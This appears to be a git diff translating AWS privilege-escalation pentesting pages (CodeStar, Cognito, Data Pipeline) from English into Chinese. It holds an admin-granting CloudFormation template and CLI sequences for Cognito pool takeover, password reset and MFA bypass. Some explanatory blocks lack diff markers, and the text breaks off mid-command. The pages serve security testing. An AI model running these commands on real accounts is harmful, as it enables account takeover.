"iam:CreateAccessKey", - "iam:UpdateAccessKey", - "iam:DeleteAccessKey", - "iam:UpdateSSHPublicKey", - "iam:UploadSSHPublicKey", - "iam:DeleteSSHPublicKey", - "iam:CreateServiceSpecificCredential", - "iam:UpdateServiceSpecificCredential", - "iam:DeleteServiceSpecificCredential", - "iam:ResetServiceSpecificCredential", - "iam:Get*", - "iam:List*" - ], - "Resource": ["arn:aws:iam::947247140022:user/${aws:username}"] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "1", +"Effect": "Allow", +"Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"], +"Resource": [ +"arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", +"arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", +"arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" +] +}, +{ +"Sid": "2", +"Effect": "Allow", +"Action": [ +"codestar:DescribeUserProfile", +"codestar:ListProjects", +"codestar:ListUserProfiles", +"codestar:VerifyServiceRole", +"cloud9:DescribeEnvironment*", +"cloud9:ValidateEnvironmentName", +"cloudwatch:DescribeAlarms", +"cloudwatch:GetMetricStatistics", +"cloudwatch:ListMetrics", +"codedeploy:BatchGet*", +"codedeploy:List*", +"codestar-connections:UseConnection", +"ec2:DescribeInstanceTypeOfferings", +"ec2:DescribeInternetGateways", +"ec2:DescribeNatGateways", +"ec2:DescribeRouteTables", +"ec2:DescribeSecurityGroups", +"ec2:DescribeSubnets", +"ec2:DescribeVpcs", +"events:ListRuleNamesByTarget", +"iam:GetAccountSummary", +"iam:GetUser", +"iam:ListAccountAliases", +"iam:ListRoles", +"iam:ListUsers", +"lambda:List*", +"sns:List*" +], +"Resource": ["*"] +}, +{ +"Sid": "3", +"Effect": "Allow", +"Action": [ +"codestar:*UserProfile", +"iam:GenerateCredentialReport", +"iam:GenerateServiceLastAccessedDetails", +"iam:CreateAccessKey", +"iam:UpdateAccessKey", +"iam:DeleteAccessKey", +"iam:UpdateSSHPublicKey", +"iam:UploadSSHPublicKey", +"iam:DeleteSSHPublicKey", +"iam:CreateServiceSpecificCredential", +"iam:UpdateServiceSpecificCredential", +"iam:DeleteServiceSpecificCredential", +"iam:ResetServiceSpecificCredential", +"iam:Get*", +"iam:List*" +], +"Resource": ["arn:aws:iam::947247140022:user/${aws:username}"] +} +] } ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md index 891d72df5..b418f1d8c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md @@ -2,42 +2,39 @@ {{#include ../../../../banners/hacktricks-training.md}} -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. - -To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. 
The following one can be used to set a managed policy to a user under your control and **give it admin permissions**: +通过这些权限,您可以**滥用 codestar IAM 角色**来通过**cloudformation 模板**执行**任意操作**。 +要利用这一点,您需要创建一个**可以从被攻击账户访问的 S3 存储桶**。上传一个名为 `toolchain.json` 的文件。该文件应包含**cloudformation 模板漏洞**。以下内容可用于将托管策略设置为您控制的用户,并**授予其管理员权限**: ```json:toolchain.json { - "Resources": { - "supercodestar": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "ManagedPolicyName": "CodeStar_supercodestar", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "*", - "Resource": "*" - } - ] - }, - "Users": [""] - } - } - } +"Resources": { +"supercodestar": { +"Type": "AWS::IAM::ManagedPolicy", +"Properties": { +"ManagedPolicyName": "CodeStar_supercodestar", +"PolicyDocument": { +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": "*", +"Resource": "*" +} +] +}, +"Users": [""] +} +} +} } ``` - -Also **upload** this `empty zip` file to the **bucket**: +也**上传**这个 `empty zip` 文件到 **bucket**: {% file src="../../../../images/empty.zip" %} -Remember that the **bucket with both files must be accessible by the victim account**. - -With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project: +请记住,**包含这两个文件的 bucket 必须可以被受害者账户访问**。 +上传完这两样东西后,您现在可以继续进行 **exploitation** 创建一个 **codestar** 项目: ```bash PROJECT_NAME="supercodestar" @@ -45,19 +42,19 @@ PROJECT_NAME="supercodestar" ## In this JSON the bucket and key (path) to the empry.zip file is used SOURCE_CODE_PATH="/tmp/surce_code.json" SOURCE_CODE="[ - { - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"empty.zip\" - } - }, - \"destination\": { - \"codeCommit\": { - \"name\": \"$PROJECT_NAME\" - } - } - } +{ +\"source\": { +\"s3\": { +\"bucketName\": \"privesc\", +\"bucketKey\": \"empty.zip\" +} +}, +\"destination\": { +\"codeCommit\": { +\"name\": \"$PROJECT_NAME\" +} +} +} ]" printf "$SOURCE_CODE" > $SOURCE_CODE_PATH @@ -65,28 +62,23 @@ printf "$SOURCE_CODE" > $SOURCE_CODE_PATH ## In this JSON the bucket and key (path) to the toolchain.json file is used TOOLCHAIN_PATH="/tmp/tool_chain.json" TOOLCHAIN="{ - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"toolchain.json\" - } - }, - \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" +\"source\": { +\"s3\": { +\"bucketName\": \"privesc\", +\"bucketKey\": \"toolchain.json\" +} +}, +\"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" }" printf "$TOOLCHAIN" > $TOOLCHAIN_PATH # Create the codestar project that will use the cloudformation epxloit to privesc aws codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME \ - --source-code file://$SOURCE_CODE_PATH \ - --toolchain file://$TOOLCHAIN_PATH +--name $PROJECT_NAME \ +--id $PROJECT_NAME \ +--source-code file://$SOURCE_CODE_PATH \ +--toolchain file://$TOOLCHAIN_PATH ``` - -This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user. 
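A quick way to confirm that the CloudFormation exploit above actually ran is to look for the managed policy it creates. This is a minimal verification sketch, assuming the `toolchain.json` shown earlier was used unchanged and that `<attacker-controlled-user>` is a placeholder for the user name you put in its `Users` field:

```bash
# Confirm the stack created the managed policy defined in toolchain.json
aws iam list-policies --scope Local \
  --query 'Policies[?PolicyName==`CodeStar_supercodestar`].[PolicyName,Arn]'

# Confirm it is now attached to the user you placed in the "Users" field
aws iam list-attached-user-policies --user-name <attacker-controlled-user>
```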
+此漏洞基于**这些权限的Pacu漏洞**:[https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) 在这里你可以找到为角色创建管理员管理策略的变体,而不是为用户创建。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md index ddd0c1efd..ba2977e3e 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md @@ -4,28 +4,27 @@ ## Cognito -For more info about Cognito check: +有关Cognito的更多信息,请查看: {{#ref}} ../aws-services/aws-cognito-enum/ {{#endref}} -### Gathering credentials from Identity Pool +### 从身份池收集凭证 -As Cognito can grant **IAM role credentials** to both **authenticated** an **unauthenticated** **users**, if you locate the **Identity Pool ID** of an application (should be hardcoded on it) you can obtain new credentials and therefore privesc (inside an AWS account where you probably didn't even have any credential previously). +由于Cognito可以向**已认证**和**未认证**的**用户**授予**IAM角色凭证**,如果您找到应用程序的**身份池ID**(应该是硬编码在其中),您可以获得新的凭证,从而实现权限提升(在您可能之前没有任何凭证的AWS账户内)。 -For more information [**check this page**](../aws-unauthenticated-enum-access/#cognito). +有关更多信息,请[**查看此页面**](../aws-unauthenticated-enum-access/#cognito)。 -**Potential Impact:** Direct privesc to the services role attached to unauth users (and probably to the one attached to auth users). +**潜在影响:** 直接权限提升到附加给未认证用户的服务角色(可能也包括附加给已认证用户的角色)。 ### `cognito-identity:SetIdentityPoolRoles`, `iam:PassRole` -With this permission you can **grant any cognito role** to the authenticated/unauthenticated users of the cognito app. - +通过此权限,您可以**授予任何Cognito角色**给Cognito应用的已认证/未认证用户。 ```bash aws cognito-identity set-identity-pool-roles \ - --identity-pool-id \ - --roles unauthenticated= +--identity-pool-id \ +--roles unauthenticated= # Get credentials ## Get one ID @@ -33,286 +32,243 @@ aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-90 ## Get creds for that id aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374" ``` +如果 Cognito 应用 **没有启用未认证用户**,您可能还需要权限 `cognito-identity:UpdateIdentityPool` 来启用它。 -If the cognito app **doesn't have unauthenticated users enabled** you might need also the permission `cognito-identity:UpdateIdentityPool` to enable it. - -**Potential Impact:** Direct privesc to any cognito role. +**潜在影响:** 直接的权限提升到任何 Cognito 角色。 ### `cognito-identity:update-identity-pool` -An attacker with this permission could set for example a Cognito User Pool under his control or any other identity provider where he can login as a **way to access this Cognito Identity Pool**. Then, just **login** on that user provider will **allow him to access the configured authenticated role in the Identity Pool**. 
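The `get-credentials-for-identity` call in the `cognito-identity:SetIdentityPoolRoles` section above returns temporary keys. A minimal sketch (the key values below are placeholders copied from that output) of plugging them into the CLI to see which role the identity resolved to:

```bash
# Values are placeholders taken from the get-credentials-for-identity response
export AWS_ACCESS_KEY_ID='ASIA...'
export AWS_SECRET_ACCESS_KEY='<SecretKey>'
export AWS_SESSION_TOKEN='<SessionToken>'

# Check which role the identity resolved to before enumerating further
aws sts get-caller-identity
```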
- +拥有此权限的攻击者可以设置例如一个在他控制下的 Cognito 用户池或任何其他身份提供者,在那里他可以登录 **以访问此 Cognito 身份池**。然后,只需在该用户提供者上 **登录** 就会 **允许他访问身份池中配置的认证角色**。 ```bash # This example is using a Cognito User Pool as identity provider ## but you could use any other identity provider aws cognito-identity update-identity-pool \ - --identity-pool-id \ - --identity-pool-name \ - [--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \ - --cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false +--identity-pool-id \ +--identity-pool-name \ +[--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \ +--cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false # Now you need to login to the User Pool you have configured ## after having the id token of the login continue with the following commands: # In this step you should have already an ID Token aws cognito-identity get-id \ - --identity-pool-id \ - --logins cognito-idp..amazonaws.com/= +--identity-pool-id \ +--logins cognito-idp..amazonaws.com/= # Get the identity_id from thr previous commnad response aws cognito-identity get-credentials-for-identity \ - --identity-id \ - --logins cognito-idp..amazonaws.com/= +--identity-id \ +--logins cognito-idp..amazonaws.com/= ``` - -It's also possible to **abuse this permission to allow basic auth**: - +这也可以**滥用此权限以允许基本身份验证**: ```bash aws cognito-identity update-identity-pool \ - --identity-pool-id \ - --identity-pool-name \ - --allow-unauthenticated-identities - --allow-classic-flow +--identity-pool-id \ +--identity-pool-name \ +--allow-unauthenticated-identities +--allow-classic-flow ``` - -**Potential Impact**: Compromise the configured authenticated IAM role inside the identity pool. +**潜在影响**:破坏身份池中配置的经过身份验证的 IAM 角色。 ### `cognito-idp:AdminAddUserToGroup` -This permission allows to **add a Cognito user to a Cognito group**, therefore an attacker could abuse this permission to add an user under his control to other groups with **better** privileges or **different IAM roles**: - +此权限允许**将 Cognito 用户添加到 Cognito 组**,因此攻击者可以滥用此权限将其控制下的用户添加到具有**更好**权限或**不同 IAM 角色**的其他组中: ```bash aws cognito-idp admin-add-user-to-group \ - --user-pool-id \ - --username \ - --group-name +--user-pool-id \ +--username \ +--group-name ``` - -**Potential Impact:** Privesc to other Cognito groups and IAM roles attached to User Pool Groups. +**潜在影响:** 提升权限到其他Cognito组和附加到用户池组的IAM角色。 ### (`cognito-idp:CreateGroup` | `cognito-idp:UpdateGroup`), `iam:PassRole` -An attacker with these permissions could **create/update groups** with **every IAM role that can be used by a compromised Cognito Identity Provider** and make a compromised user part of the group, accessing all those roles: - +拥有这些权限的攻击者可以**创建/更新组**,并使用**被攻陷的Cognito身份提供者可以使用的每个IAM角色**,使被攻陷的用户成为该组的一部分,从而访问所有这些角色: ```bash aws cognito-idp create-group --group-name Hacked --user-pool-id --role-arn ``` - -**Potential Impact:** Privesc to other Cognito IAM roles. +**潜在影响:** 提升到其他Cognito IAM角色。 ### `cognito-idp:AdminConfirmSignUp` -This permission allows to **verify a signup**. By default anyone can sign in Cognito applications, if that is left, a user could create an account with any data and verify it with this permission. 
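The confirm call is normally paired with a plain self-registration against the app client. A hedged sketch of that first step (client id and attribute values are placeholders; it assumes self sign-up is enabled on the pool and that the app client has no client secret, otherwise a `--secret-hash` is also required):

```bash
# Unauthenticated self-registration against the User Pool app client
aws cognito-idp sign-up \
  --client-id <client-id> \
  --username attacker@example.com \
  --password 'SuperSecret123!' \
  --user-attributes Name=email,Value=attacker@example.com

# The new account can then be confirmed with admin-confirm-sign-up as shown below
```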
- +此权限允许**验证注册**。默认情况下,任何人都可以登录Cognito应用程序,如果不加以限制,用户可以使用任何数据创建帐户并通过此权限进行验证。 ```bash aws cognito-idp admin-confirm-sign-up \ - --user-pool-id \ - --username +--user-pool-id \ +--username ``` - -**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users if you can register a new user. Indirect privesc to other app functionalities being able to confirm any account. +**潜在影响:** 如果您可以注册新用户,则对经过身份验证的用户的身份池 IAM 角色进行间接权限提升。能够确认任何帐户会导致对其他应用功能的间接权限提升。 ### `cognito-idp:AdminCreateUser` -This permission would allow an attacker to create a new user inside the user pool. The new user is created as enabled, but will need to change its password. - +此权限将允许攻击者在用户池中创建新用户。新用户被创建为启用状态,但需要更改其密码。 ```bash aws cognito-idp admin-create-user \ - --user-pool-id \ - --username \ - [--user-attributes ] ([Name=email,Value=email@gmail.com]) - [--validation-data ] - [--temporary-password ] +--user-pool-id \ +--username \ +[--user-attributes ] ([Name=email,Value=email@gmail.com]) +[--validation-data ] +[--temporary-password ] ``` - -**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user +**潜在影响:** 直接提升到身份池 IAM 角色的认证用户。间接提升到其他应用功能,能够创建任何用户。 ### `cognito-idp:AdminEnableUser` -This permissions can help in. a very edge-case scenario where an attacker found the credentials of a disabled user and he needs to **enable it again**. - +此权限可以在非常边缘的情况下提供帮助,攻击者发现了一个禁用用户的凭证,并且他需要**再次启用它**。 ```bash aws cognito-idp admin-enable-user \ - --user-pool-id \ - --username +--user-pool-id \ +--username ``` - -**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users and permissions of the user if the attacker had credentials for a disabled user. +**潜在影响:** 间接提升到身份池 IAM 角色的权限,适用于经过身份验证的用户和用户的权限,如果攻击者拥有禁用用户的凭证。 ### `cognito-idp:AdminInitiateAuth`, **`cognito-idp:AdminRespondToAuthChallenge`** -This permission allows to login with the [**method ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link. +此权限允许使用 [**方法 ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)** 登录。** 有关更多信息,请访问链接。 ### `cognito-idp:AdminSetUserPassword` -This permission would allow an attacker to **change the password of any user**, making him able to impersonate any user (that doesn't have MFA enabled). - +此权限将允许攻击者 **更改任何用户的密码**,使其能够冒充任何用户(不启用 MFA 的用户)。 ```bash aws cognito-idp admin-set-user-password \ - --user-pool-id \ - --username \ - --password \ - --permanent +--user-pool-id \ +--username \ +--password \ +--permanent ``` - -**Potential Impact:** Direct privesc to potentially any user, so access to all the groups each user is member of and access to the Identity Pool authenticated IAM role. +**潜在影响:** 直接的权限提升,可能影响任何用户,因此可以访问每个用户所属于的所有组以及访问身份池认证的 IAM 角色。 ### `cognito-idp:AdminSetUserSettings` | `cognito-idp:SetUserMFAPreference` | `cognito-idp:SetUserPoolMfaConfig` | `cognito-idp:UpdateUserPool` -**AdminSetUserSettings**: An attacker could potentially abuse this permission to set a mobile phone under his control as **SMS MFA of a user**. 
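As a follow-up to the `cognito-idp:AdminSetUserPassword` primitive above: once the victim's password has been reset, you can authenticate through the normal user flow. A minimal sketch, assuming the app client permits `USER_PASSWORD_AUTH` and has no client secret (all values are placeholders):

```bash
# Log in as the victim with the password set via admin-set-user-password
aws cognito-idp initiate-auth \
  --client-id <client-id> \
  --auth-flow USER_PASSWORD_AUTH \
  --auth-parameters USERNAME=<victim-username>,PASSWORD='NewPassword123!'
# The response contains Id/Access/Refresh tokens for the victim's session
```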
- +**AdminSetUserSettings**:攻击者可能会滥用此权限,将其控制的手机设置为 **用户的 SMS MFA**。 ```bash aws cognito-idp admin-set-user-settings \ - --user-pool-id \ - --username \ - --mfa-options +--user-pool-id \ +--username \ +--mfa-options ``` - -**SetUserMFAPreference:** Similar to the previous one this permission can be used to set MFA preferences of a user to bypass the MFA protection. - +**SetUserMFAPreference:** 类似于前一个权限,此权限可用于设置用户的 MFA 偏好,以绕过 MFA 保护。 ```bash aws cognito-idp admin-set-user-mfa-preference \ - [--sms-mfa-settings ] \ - [--software-token-mfa-settings ] \ - --username \ - --user-pool-id +[--sms-mfa-settings ] \ +[--software-token-mfa-settings ] \ +--username \ +--user-pool-id ``` - -**SetUserPoolMfaConfig**: Similar to the previous one this permission can be used to set MFA preferences of a user pool to bypass the MFA protection. - +**SetUserPoolMfaConfig**: 类似于前一个权限,此权限可用于设置用户池的 MFA 首选项,以绕过 MFA 保护。 ```bash aws cognito-idp set-user-pool-mfa-config \ - --user-pool-id \ - [--sms-mfa-configuration ] \ - [--software-token-mfa-configuration ] \ - [--mfa-configuration ] +--user-pool-id \ +[--sms-mfa-configuration ] \ +[--software-token-mfa-configuration ] \ +[--mfa-configuration ] ``` +**UpdateUserPool:** 也可以更新用户池以更改 MFA 策略。 [在这里查看 cli](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html)。 -**UpdateUserPool:** It's also possible to update the user pool to change the MFA policy. [Check cli here](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html). - -**Potential Impact:** Indirect privesc to potentially any user the attacker knows the credentials of, this could allow to bypass the MFA protection. +**Potential Impact:** 间接的权限提升,可能针对攻击者知道凭据的任何用户,这可能允许绕过 MFA 保护。 ### `cognito-idp:AdminUpdateUserAttributes` -An attacker with this permission could change the email or phone number or any other attribute of a user under his control to try to obtain more privileges in an underlaying application.\ -This allows to change an email or phone number and set it as verified. - +拥有此权限的攻击者可以更改其控制下用户的电子邮件或电话号码或任何其他属性,以尝试在基础应用程序中获得更多权限。\ +这允许更改电子邮件或电话号码并将其设置为已验证。 ```bash aws cognito-idp admin-update-user-attributes \ - --user-pool-id \ - --username \ - --user-attributes +--user-pool-id \ +--username \ +--user-attributes ``` - -**Potential Impact:** Potential indirect privesc in the underlying application using Cognito User Pool that gives privileges based on user attributes. +**潜在影响:** 在使用 Cognito 用户池的基础应用程序中,可能会间接提升权限,基于用户属性授予权限。 ### `cognito-idp:CreateUserPoolClient` | `cognito-idp:UpdateUserPoolClient` -An attacker with this permission could **create a new User Pool Client less restricted** than already existing pool clients. For example, the new client could allow any kind of method to authenticate, don't have any secret, have token revocation disabled, allow tokens to be valid for a longer period... +拥有此权限的攻击者可以**创建一个新的用户池客户端,其限制低于**现有的池客户端。例如,新的客户端可以允许任何类型的方法进行身份验证,没有任何秘密,禁用令牌撤销,允许令牌有效期更长... -The same can be be don if instead of creating a new client, an **existing one is modified**. - -In the [**command line**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html) (or the [**update one**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)) you can see all the options, check it!. 
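As a more concrete illustration of the relaxed client described in the `cognito-idp:CreateUserPoolClient` section above (the pool id, client name and exact flags to weaken are assumptions and depend on the target app):

```bash
# Over-permissive app client: password auth, no secret, revocation off, long-lived refresh tokens
aws cognito-idp create-user-pool-client \
  --user-pool-id <user-pool-id> \
  --client-name innocent-looking-client \
  --no-generate-secret \
  --explicit-auth-flows ALLOW_USER_PASSWORD_AUTH ALLOW_REFRESH_TOKEN_AUTH \
  --no-enable-token-revocation \
  --refresh-token-validity 3650
```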
+如果不是创建一个新客户端,而是**修改现有客户端**,也可以做到这一点。 +在 [**命令行**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html)(或 [**更新命令**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html))中,您可以查看所有选项,检查一下! ```bash aws cognito-idp create-user-pool-client \ - --user-pool-id \ - --client-name \ - [...] +--user-pool-id \ +--client-name \ +[...] ``` - -**Potential Impact:** Potential indirect privesc to the Identity Pool authorized user used by the User Pool by creating a new client that relax the security measures and makes possible to an attacker to login with a user he was able to create. +**潜在影响:** 通过创建一个放宽安全措施的新客户端,可能间接导致对用户池使用的身份池授权用户的权限提升,使攻击者能够使用他能够创建的用户登录。 ### `cognito-idp:CreateUserImportJob` | `cognito-idp:StartUserImportJob` -An attacker could abuse this permission to create users y uploading a csv with new users. - +攻击者可以利用此权限通过上传包含新用户的csv文件来创建用户。 ```bash # Create a new import job aws cognito-idp create-user-import-job \ - --job-name \ - --user-pool-id \ - --cloud-watch-logs-role-arn +--job-name \ +--user-pool-id \ +--cloud-watch-logs-role-arn # Use a new import job aws cognito-idp start-user-import-job \ - --user-pool-id \ - --job-id +--user-pool-id \ +--job-id # Both options before will give you a URL where you can send the CVS file with the users to create curl -v -T "PATH_TO_CSV_FILE" \ - -H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL" +-H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL" ``` +(在创建新导入作业的情况下,您可能还需要 iam passrole 权限,我还没有测试过)。 -(In the case where you create a new import job you might also need the iam passrole permission, I haven't tested it yet). - -**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user. +**潜在影响:** 直接提升到经过身份验证的用户的身份池 IAM 角色。间接提升到其他应用功能,能够创建任何用户。 ### `cognito-idp:CreateIdentityProvider` | `cognito-idp:UpdateIdentityProvider` -An attacker could create a new identity provider to then be able to **login through this provider**. - +攻击者可以创建一个新的身份提供者,从而能够通过该提供者**登录**。 ```bash aws cognito-idp create-identity-provider \ - --user-pool-id \ - --provider-name \ - --provider-type \ - --provider-details \ - [--attribute-mapping ] \ - [--idp-identifiers ] +--user-pool-id \ +--provider-name \ +--provider-type \ +--provider-details \ +[--attribute-mapping ] \ +[--idp-identifiers ] ``` +**潜在影响:** 直接提升到经过身份验证的用户的身份池 IAM 角色。间接提升到其他应用功能,能够创建任何用户。 -**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user. +### cognito-sync:\* 分析 -### cognito-sync:\* Analysis +这是 Cognito 身份池角色中默认的非常常见的权限。即使权限中的通配符看起来总是不好(特别是来自 AWS),**给定的权限从攻击者的角度来看并不是特别有用**。 -This is a very common permission by default in roles of Cognito Identity Pools. Even if a wildcard in a permissions always looks bad (specially coming from AWS), the **given permissions aren't super useful from an attackers perspective**. 
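If you still want to look for leftovers in those cognito-sync datasets, a short enumeration sketch (the identity pool id, identity id and dataset name are placeholders taken from the previous calls):

```bash
# Which identity pools / identities actually have synced data
aws cognito-sync list-identity-pool-usage

# List and dump the datasets of a concrete identity
aws cognito-sync list-datasets \
  --identity-pool-id <identity-pool-id> --identity-id <identity-id>
aws cognito-sync list-records \
  --identity-pool-id <identity-pool-id> --identity-id <identity-id> \
  --dataset-name <dataset-name>
```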
+此权限允许读取身份池和身份池内身份 ID 的使用信息(这不是敏感信息)。\ +身份 ID 可能有 [**数据集**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) 分配给它们,这些是会话的信息(AWS 将其定义为 **保存的游戏**)。这可能包含某种敏感信息(但概率相当低)。您可以在 [**枚举页面**](../aws-services/aws-cognito-enum/) 找到如何访问这些信息。 -This permission allows to read use information of Identity Pools and Identity IDs inside Identity Pools (which isn't sensitive info).\ -Identity IDs might have [**Datasets**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) assigned to them, which are information of the sessions (AWS define it like a **saved game**). It might be possible that this contain some kind of sensitive information (but the probability is pretty low). You can find in the [**enumeration page**](../aws-services/aws-cognito-enum/) how to access this information. +攻击者还可以使用这些权限来 **注册自己到一个 Cognito 流,以发布这些数据集上的更改** 或 **在 Cognito 事件上触发的 Lambda**。我没有看到过这种用法,我也不期望这里有敏感信息,但这并不是不可能的。 -An attacker could also use these permissions to **enroll himself to a Cognito stream that publish changes** on these datases or a **lambda that triggers on cognito events**. I haven't seen this being used, and I wouldn't expect sensitive information here, but it isn't impossible. +### 自动化工具 -### Automatic Tools +- [Pacu](https://github.com/RhinoSecurityLabs/pacu),AWS 利用框架,现在包括 "cognito\_\_enum" 和 "cognito\_\_attack" 模块,这些模块自动枚举账户中的所有 Cognito 资产并标记弱配置、用于访问控制的用户属性等,同时还自动创建用户(包括 MFA 支持)和基于可修改自定义属性、可用身份池凭证、可假设角色的 ID 令牌等的权限提升。 -- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +有关模块功能的描述,请参见 [博客文章](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2) 的第 2 部分。有关安装说明,请参见主 [Pacu](https://github.com/RhinoSecurityLabs/pacu) 页面。 -For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. - -#### Usage - -Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: +#### 用法 +示例 cognito\_\_attack 用法,尝试用户创建和针对给定身份池和用户池客户端的所有权限提升向量: ```bash Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account: - +示例 cognito\_\_enum 用法,以收集当前 AWS 账户中可见的所有用户池、用户池客户端、身份池、用户等: ```bash Pacu (new:test) > run cognito__enum ``` +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) 是一个用 Python 编写的 CLI 工具,实施对 Cognito 的不同攻击,包括权限提升。 -- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation. 
- -#### Installation - +#### 安装 ```bash $ pip install cognito-scanner ``` - -#### Usage - +#### 用法 ```bash $ cognito-scanner --help ``` - -For more information check [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner) +有关更多信息,请查看 [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md index 82c82682e..61789404d 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md @@ -4,7 +4,7 @@ ## datapipeline -For more info about datapipeline check: +有关datapipeline的更多信息,请查看: {{#ref}} ../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md @@ -12,67 +12,57 @@ For more info about datapipeline check: ### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline` -Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:** - +具有这些**权限的用户可以通过创建数据管道来提升权限**,以使用**分配角色的权限执行任意命令:** ```bash aws datapipeline create-pipeline --name 